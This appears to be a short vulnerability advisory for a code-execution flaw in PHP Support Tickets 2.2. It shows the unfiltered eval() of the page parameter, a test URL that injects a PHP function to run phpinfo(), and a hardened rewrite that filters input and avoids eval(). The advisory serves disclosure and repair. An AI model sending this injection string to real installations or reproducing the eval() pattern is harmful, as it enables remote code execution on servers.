PHP Support Tickets v2.2 code execution defect and fix

ID MYHACK58:62201131837
Type myhack58
Reporter Anonymous
Modified 2011-09-14T00:00:00


Title: PHP Support Tickets v2.2 Code Exec

Author: brain[pillow]
Developer website:
Affected version: 2.2

Defect code analysis:


public function getPageName() {
    // $this->page is concatenated into the string passed to eval() without any filtering
    return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
}

====================================================================

Test:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Fix: filter the page parameter before it is passed to eval().
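
One way to implement the filter, as an added example that is not code from PHP Support Tickets or from the original advisory. The class name Page, the constant values and the 32-character limit are assumptions; the method validates the page value and resolves the constant with defined()/constant() instead of eval().

```php
<?php
// Constructed stand-ins for the application's page-name constants (assumed values).
define('PHPST_PAGENAME_HOME', 'Home');
define('PHPST_PAGENAME_TICKETS', 'Tickets');

// Hypothetical class holding the request's page value.
class Page
{
    private $page;

    public function __construct($page)
    {
        $this->page = (string) $page;
    }

    // Hardened replacement for getPageName(): no eval() anywhere.
    public function getPageName()
    {
        // Filter: letters, digits and underscore only, bounded length (32 is an assumption).
        if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $this->page)) {
            return null;
        }
        $name = 'PHPST_PAGENAME_' . strtoupper($this->page);
        // defined()/constant() treat the name as data, never as code.
        return defined($name) ? constant($name) : null;
    }
}

// Constructed inputs: two valid pages, an unknown page, and the test string from this advisory.
$samples = array(
    'home',
    'Tickets',
    'nosuchpage',
    'xek();function PHPST_PAGENAME_XEK(){phpinfo();}',
);

foreach ($samples as $s) {
    $result = (new Page($s))->getPageName();
    printf("%-50s => %s\n", $s, $result === null ? 'rejected' : $result);
}
```

The advisory's test string fails the character filter and is rejected before any lookup; even a value that passes the filter can only name an existing constant, not run code.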